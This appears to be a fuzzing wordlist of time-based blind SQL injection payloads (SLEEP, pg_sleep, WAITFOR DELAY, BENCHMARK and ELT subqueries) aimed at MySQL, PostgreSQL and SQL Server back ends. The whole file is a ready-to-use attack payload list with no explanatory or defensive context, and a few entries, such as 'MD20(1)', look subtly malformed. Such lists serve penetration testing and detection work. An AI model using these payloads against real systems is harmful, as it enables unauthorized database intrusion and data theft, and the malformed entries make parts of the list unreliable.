if(now()=sysdate(),sleep(20),0)
or SELECT SLEEP(20); #
or SELECT pg_sleep(20);
or SLEEP(20)
or SLEEP(20)#
or SLEEP(20)--
or SLEEP(20)="
or SLEEP(20)='
or WAITFOR DELAY '0:0:20'
or WAITFOR DELAY '0:0:20'--
or benchmark(200000000,MD20(1))
or benchmark(200000000,MD20(1))#
or benchmark(200000000,MD20(1))--
or pg_SLEEP(20)
or pg_SLEEP(20)#
or pg_SLEEP(20)--
or sleep 20
or sleep 20--
or sleep(20)
or sleep(20)--
pg_SLEEP(20)
pg_SLEEP(20)#
pg_SLEEP(20)--
pg_sleep(10)--
pg_sleep(20)
pg_sleep(20)--
sleep(10)--
sleep(20)#
sleep(20)++
sleep(20)--
sleep(20)--+
waitfor delay '00:00:20'#
waitfor delay '00:00:20'++
waitfor delay '00:00:20'--
||(SELECT 0x20720206971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
